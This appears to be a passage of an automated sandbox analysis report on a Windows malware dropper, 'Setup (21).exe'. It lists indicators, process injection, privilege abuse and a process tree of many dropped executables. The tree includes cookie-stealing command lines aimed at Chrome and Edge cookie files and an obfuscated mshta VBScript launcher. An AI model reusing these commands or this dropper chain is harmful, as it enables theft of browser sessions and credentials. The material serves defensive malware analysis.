170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner Installation.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 11 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 164 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 204 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 205 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 129 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 140 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 166 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 168 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 210 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 414 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 423 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 134 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup (21).exeKsw2BPZMcDG5H5CumnoX5El7.exeWerFault.exeWerFault.exepid process 3400 Setup (21).exe 3400 Setup (21).exe 2312 Ksw2BPZMcDG5H5CumnoX5El7.exe 2312 Ksw2BPZMcDG5H5CumnoX5El7.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 2076 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 3632 WerFault.exe 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 4956 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2764 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
Ksw2BPZMcDG5H5CumnoX5El7.exepid process 2312 Ksw2BPZMcDG5H5CumnoX5El7.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
up_RX3dLyP9fcF3fJmZOtovo.execPlKfUNTpg7mJXht2DhaDJOZ.exeym5vryTqDPCLWaLwkXNcpDF4.exeQ5pZL3v1i8oT6D1PqwPrbLAh.exeWerFault.exeWerFault.exeWerFault.exeIyAWo3HIaYK2enfqDaaLxk_Z.exedescription pid process Token: SeDebugPrivilege 3424 up_RX3dLyP9fcF3fJmZOtovo.exe Token: SeDebugPrivilege 3892 cPlKfUNTpg7mJXht2DhaDJOZ.exe Token: SeDebugPrivilege 2120 ym5vryTqDPCLWaLwkXNcpDF4.exe Token: SeDebugPrivilege 2772 Q5pZL3v1i8oT6D1PqwPrbLAh.exe Token: SeRestorePrivilege 4956 Token: SeBackupPrivilege 4956 Token: SeRestorePrivilege 2076 WerFault.exe Token: SeBackupPrivilege 2076 WerFault.exe Token: SeBackupPrivilege 2076 WerFault.exe Token: SeDebugPrivilege 2076 WerFault.exe Token: SeDebugPrivilege 3632 WerFault.exe Token: SeDebugPrivilege 4956 Token: SeDebugPrivilege 4844 WerFault.exe Token: SeDebugPrivilege 3828 IyAWo3HIaYK2enfqDaaLxk_Z.exe Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 Token: SeShutdownPrivilege 2764 Token: SeCreatePagefilePrivilege 2764 -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
uED6jlI4PTuJuwIByjVd3_2r.tmpCleaner Installation.exeInlog.tmpWEATHER Manager.tmpVPN.tmppid process 4320 uED6jlI4PTuJuwIByjVd3_2r.tmp 4492 Cleaner Installation.exe 2764 2764 1764 Inlog.tmp 4784 WEATHER Manager.tmp 5156 VPN.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup (21).exedescription pid process target process PID 3400 wrote to memory of 1296 3400 Setup (21).exe DN285WvFY40Vo3pQjrXP92K8.exe PID 3400 wrote to memory of 1296 3400 Setup (21).exe DN285WvFY40Vo3pQjrXP92K8.exe PID 3400 wrote to memory of 1296 3400 Setup (21).exe DN285WvFY40Vo3pQjrXP92K8.exe PID 3400 wrote to memory of 3076 3400 Setup (21).exe XUV6vPsYpCU5h0OX1KBr3ePA.exe PID 3400 wrote to memory of 3076 3400 Setup (21).exe XUV6vPsYpCU5h0OX1KBr3ePA.exe PID 3400 wrote to memory of 3076 3400 Setup (21).exe XUV6vPsYpCU5h0OX1KBr3ePA.exe PID 3400 wrote to memory of 2120 3400 Setup (21).exe ym5vryTqDPCLWaLwkXNcpDF4.exe PID 3400 wrote to memory of 2120 3400 Setup (21).exe ym5vryTqDPCLWaLwkXNcpDF4.exe PID 3400 wrote to memory of 2120 3400 Setup (21).exe ym5vryTqDPCLWaLwkXNcpDF4.exe PID 3400 wrote to memory of 3828 3400 Setup (21).exe IyAWo3HIaYK2enfqDaaLxk_Z.exe PID 3400 wrote to memory of 3828 3400 Setup (21).exe IyAWo3HIaYK2enfqDaaLxk_Z.exe PID 3400 wrote to memory of 3828 3400 Setup (21).exe IyAWo3HIaYK2enfqDaaLxk_Z.exe PID 3400 wrote to memory of 1676 3400 Setup (21).exe HGYCjbLD2lTVAEa8PUVxbSm2.exe PID 3400 wrote to memory of 1676 3400 Setup (21).exe HGYCjbLD2lTVAEa8PUVxbSm2.exe PID 3400 wrote to memory of 1676 3400 Setup (21).exe HGYCjbLD2lTVAEa8PUVxbSm2.exe PID 3400 wrote to memory of 4016 3400 Setup (21).exe d_rbRdAwkUM3FRfL059OI5jN.exe PID 3400 wrote to memory of 4016 3400 Setup (21).exe d_rbRdAwkUM3FRfL059OI5jN.exe PID 3400 wrote to memory of 3424 3400 Setup (21).exe up_RX3dLyP9fcF3fJmZOtovo.exe PID 3400 wrote to memory of 3424 3400 Setup (21).exe up_RX3dLyP9fcF3fJmZOtovo.exe PID 3400 wrote to memory of 3364 3400 Setup (21).exe UTvozCvgVVywSzZLa3TVaxAG.exe PID 3400 wrote to memory of 3364 3400 Setup (21).exe UTvozCvgVVywSzZLa3TVaxAG.exe PID 3400 wrote to memory of 3364 3400 Setup (21).exe UTvozCvgVVywSzZLa3TVaxAG.exe PID 3400 wrote to memory of 3892 3400 Setup (21).exe cPlKfUNTpg7mJXht2DhaDJOZ.exe PID 3400 wrote to memory of 3892 3400 Setup (21).exe cPlKfUNTpg7mJXht2DhaDJOZ.exe PID 3400 wrote to memory of 3892 3400 Setup (21).exe cPlKfUNTpg7mJXht2DhaDJOZ.exe PID 3400 wrote to memory of 808 3400 Setup (21).exe VPj0hUPAj0E3dJkevh_aWd6D.exe PID 3400 wrote to memory of 808 3400 Setup (21).exe VPj0hUPAj0E3dJkevh_aWd6D.exe PID 3400 wrote to memory of 808 3400 Setup (21).exe VPj0hUPAj0E3dJkevh_aWd6D.exe PID 3400 wrote to memory of 3900 3400 Setup (21).exe jT9ljWrB8H2SDmiwcZPQyNar.exe PID 3400 wrote to memory of 3900 3400 Setup (21).exe jT9ljWrB8H2SDmiwcZPQyNar.exe PID 3400 wrote to memory of 3900 3400 Setup (21).exe jT9ljWrB8H2SDmiwcZPQyNar.exe PID 3400 wrote to memory of 1472 3400 Setup (21).exe 1875xlBprgCQ3gKw9xrizZX9.exe PID 3400 wrote to memory of 1472 3400 Setup (21).exe 1875xlBprgCQ3gKw9xrizZX9.exe PID 3400 wrote to memory of 1472 3400 Setup (21).exe 1875xlBprgCQ3gKw9xrizZX9.exe PID 3400 wrote to memory of 2504 3400 Setup (21).exe lDyGp02VzbDIUiSi84iUnU4h.exe PID 3400 wrote to memory of 2504 3400 Setup (21).exe lDyGp02VzbDIUiSi84iUnU4h.exe PID 3400 wrote to memory of 2504 3400 Setup (21).exe lDyGp02VzbDIUiSi84iUnU4h.exe PID 3400 wrote to memory of 2304 3400 Setup (21).exe Ksw2BPZMcDG5H5CumnoX5El7.exe PID 3400 wrote to memory of 2304 3400 Setup (21).exe Ksw2BPZMcDG5H5CumnoX5El7.exe PID 3400 wrote to memory of 2304 3400 Setup (21).exe Ksw2BPZMcDG5H5CumnoX5El7.exe PID 3400 wrote to memory of 4040 3400 Setup (21).exe nu51Bm0jwjCZXfWisMZjuUlk.exe PID 3400 wrote to memory of 4040 3400 Setup (21).exe nu51Bm0jwjCZXfWisMZjuUlk.exe PID 3400 wrote to memory of 4040 3400 Setup (21).exe nu51Bm0jwjCZXfWisMZjuUlk.exe PID 3400 wrote to memory of 4028 3400 Setup (21).exe 6O3HGRIaWBdZoB20G7JWTmMP.exe PID 3400 wrote to memory of 4028 3400 Setup (21).exe 6O3HGRIaWBdZoB20G7JWTmMP.exe PID 3400 wrote to memory of 4028 3400 Setup (21).exe 6O3HGRIaWBdZoB20G7JWTmMP.exe PID 3400 wrote to memory of 1016 3400 Setup (21).exe GE8bIVNODDL62KupPYqp9x2h.exe PID 3400 wrote to memory of 1016 3400 Setup (21).exe GE8bIVNODDL62KupPYqp9x2h.exe PID 3400 wrote to memory of 1016 3400 Setup (21).exe GE8bIVNODDL62KupPYqp9x2h.exe PID 3400 wrote to memory of 1284 3400 Setup (21).exe yHGCwNSEUTB7dqa5o73ZeO50.exe PID 3400 wrote to memory of 1284 3400 Setup (21).exe yHGCwNSEUTB7dqa5o73ZeO50.exe PID 3400 wrote to memory of 1284 3400 Setup (21).exe yHGCwNSEUTB7dqa5o73ZeO50.exe PID 3400 wrote to memory of 2596 3400 Setup (21).exe NeKq7ifKebqVoGCQyqlPy4BS.exe PID 3400 wrote to memory of 2596 3400 Setup (21).exe NeKq7ifKebqVoGCQyqlPy4BS.exe PID 3400 wrote to memory of 2596 3400 Setup (21).exe NeKq7ifKebqVoGCQyqlPy4BS.exe PID 3400 wrote to memory of 3640 3400 Setup (21).exe ULxrP04rJhVhjWNB0VmX89T_.exe PID 3400 wrote to memory of 3640 3400 Setup (21).exe ULxrP04rJhVhjWNB0VmX89T_.exe PID 3400 wrote to memory of 3640 3400 Setup (21).exe ULxrP04rJhVhjWNB0VmX89T_.exe PID 3400 wrote to memory of 1020 3400 Setup (21).exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe PID 3400 wrote to memory of 1020 3400 Setup (21).exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe PID 3400 wrote to memory of 1020 3400 Setup (21).exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe PID 3400 wrote to memory of 1052 3400 Setup (21).exe YyI5EDaPb9x7q8_KtpF3drC3.exe PID 3400 wrote to memory of 1052 3400 Setup (21).exe YyI5EDaPb9x7q8_KtpF3drC3.exe PID 3400 wrote to memory of 1052 3400 Setup (21).exe YyI5EDaPb9x7q8_KtpF3drC3.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (21).exe"C:\Users\Admin\AppData\Local\Temp\Setup (21).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\1875xlBprgCQ3gKw9xrizZX9.exe"C:\Users\Admin\Documents\1875xlBprgCQ3gKw9xrizZX9.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1875xlBprgCQ3gKw9xrizZX9.exe"C:\Users\Admin\Documents\1875xlBprgCQ3gKw9xrizZX9.exe"3⤵
-
C:\Users\Admin\Documents\VPj0hUPAj0E3dJkevh_aWd6D.exe"C:\Users\Admin\Documents\VPj0hUPAj0E3dJkevh_aWd6D.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 808 -s 17083⤵
- Program crash
-
C:\Users\Admin\Documents\jT9ljWrB8H2SDmiwcZPQyNar.exe"C:\Users\Admin\Documents\jT9ljWrB8H2SDmiwcZPQyNar.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\cPlKfUNTpg7mJXht2DhaDJOZ.exe"C:\Users\Admin\Documents\cPlKfUNTpg7mJXht2DhaDJOZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\cPlKfUNTpg7mJXht2DhaDJOZ.exe"C:\Users\Admin\Documents\cPlKfUNTpg7mJXht2DhaDJOZ.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\UTvozCvgVVywSzZLa3TVaxAG.exe"C:\Users\Admin\Documents\UTvozCvgVVywSzZLa3TVaxAG.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\up_RX3dLyP9fcF3fJmZOtovo.exe"C:\Users\Admin\Documents\up_RX3dLyP9fcF3fJmZOtovo.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\d_rbRdAwkUM3FRfL059OI5jN.exe"C:\Users\Admin\Documents\d_rbRdAwkUM3FRfL059OI5jN.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\HGYCjbLD2lTVAEa8PUVxbSm2.exe"C:\Users\Admin\Documents\HGYCjbLD2lTVAEa8PUVxbSm2.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\IyAWo3HIaYK2enfqDaaLxk_Z.exe"C:\Users\Admin\Documents\IyAWo3HIaYK2enfqDaaLxk_Z.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\ym5vryTqDPCLWaLwkXNcpDF4.exe"C:\Users\Admin\Documents\ym5vryTqDPCLWaLwkXNcpDF4.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\XUV6vPsYpCU5h0OX1KBr3ePA.exe"C:\Users\Admin\Documents\XUV6vPsYpCU5h0OX1KBr3ePA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\XUV6vPsYpCU5h0OX1KBr3ePA.exeC:\Users\Admin\Documents\XUV6vPsYpCU5h0OX1KBr3ePA.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\DN285WvFY40Vo3pQjrXP92K8.exe"C:\Users\Admin\Documents\DN285WvFY40Vo3pQjrXP92K8.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DN285WvFY40Vo3pQjrXP92K8.exeC:\Users\Admin\Documents\DN285WvFY40Vo3pQjrXP92K8.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Ksw2BPZMcDG5H5CumnoX5El7.exe"C:\Users\Admin\Documents\Ksw2BPZMcDG5H5CumnoX5El7.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Ksw2BPZMcDG5H5CumnoX5El7.exe"C:\Users\Admin\Documents\Ksw2BPZMcDG5H5CumnoX5El7.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\lDyGp02VzbDIUiSi84iUnU4h.exe"C:\Users\Admin\Documents\lDyGp02VzbDIUiSi84iUnU4h.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 4843⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\6O3HGRIaWBdZoB20G7JWTmMP.exe"C:\Users\Admin\Documents\6O3HGRIaWBdZoB20G7JWTmMP.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\6O3HGRIaWBdZoB20G7JWTmMP.exeC:\Users\Admin\Documents\6O3HGRIaWBdZoB20G7JWTmMP.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\nu51Bm0jwjCZXfWisMZjuUlk.exe"C:\Users\Admin\Documents\nu51Bm0jwjCZXfWisMZjuUlk.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\NeKq7ifKebqVoGCQyqlPy4BS.exe"C:\Users\Admin\Documents\NeKq7ifKebqVoGCQyqlPy4BS.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 6763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 6803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 6843⤵
- Program crash
-
C:\Users\Admin\Documents\yHGCwNSEUTB7dqa5o73ZeO50.exe"C:\Users\Admin\Documents\yHGCwNSEUTB7dqa5o73ZeO50.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\yHGCwNSEUTB7dqa5o73ZeO50.exe"C:\Users\Admin\Documents\yHGCwNSEUTB7dqa5o73ZeO50.exe" -q3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GE8bIVNODDL62KupPYqp9x2h.exe"C:\Users\Admin\Documents\GE8bIVNODDL62KupPYqp9x2h.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\ULxrP04rJhVhjWNB0VmX89T_.exe"C:\Users\Admin\Documents\ULxrP04rJhVhjWNB0VmX89T_.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\XJHS6Vx2mDoCXR6a61Ec6SWF.exe"C:\Users\Admin\Documents\XJHS6Vx2mDoCXR6a61Ec6SWF.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 6763⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 4923⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 6603⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 7003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 11203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 11603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 11043⤵
- Program crash
-
C:\Users\Admin\Documents\uED6jlI4PTuJuwIByjVd3_2r.exe"C:\Users\Admin\Documents\uED6jlI4PTuJuwIByjVd3_2r.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-IPFS4.tmp\uED6jlI4PTuJuwIByjVd3_2r.tmp"C:\Users\Admin\AppData\Local\Temp\is-IPFS4.tmp\uED6jlI4PTuJuwIByjVd3_2r.tmp" /SL5="$10280,138429,56832,C:\Users\Admin\Documents\uED6jlI4PTuJuwIByjVd3_2r.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Documents\Q5pZL3v1i8oT6D1PqwPrbLAh.exe"C:\Users\Admin\Documents\Q5pZL3v1i8oT6D1PqwPrbLAh.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\uGmE7ZNudzFhsulIQN2tk8Zf.exe"C:\Users\Admin\Documents\uGmE7ZNudzFhsulIQN2tk8Zf.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\uGmE7ZNudzFhsulIQN2tk8Zf.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\uGmE7ZNudzFhsulIQN2tk8Zf.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵
-
C:\Users\Admin\Documents\YyI5EDaPb9x7q8_KtpF3drC3.exe"C:\Users\Admin\Documents\YyI5EDaPb9x7q8_KtpF3drC3.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S4LN3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-S4LN3.tmp\Setup.exe" /Verysilent1⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
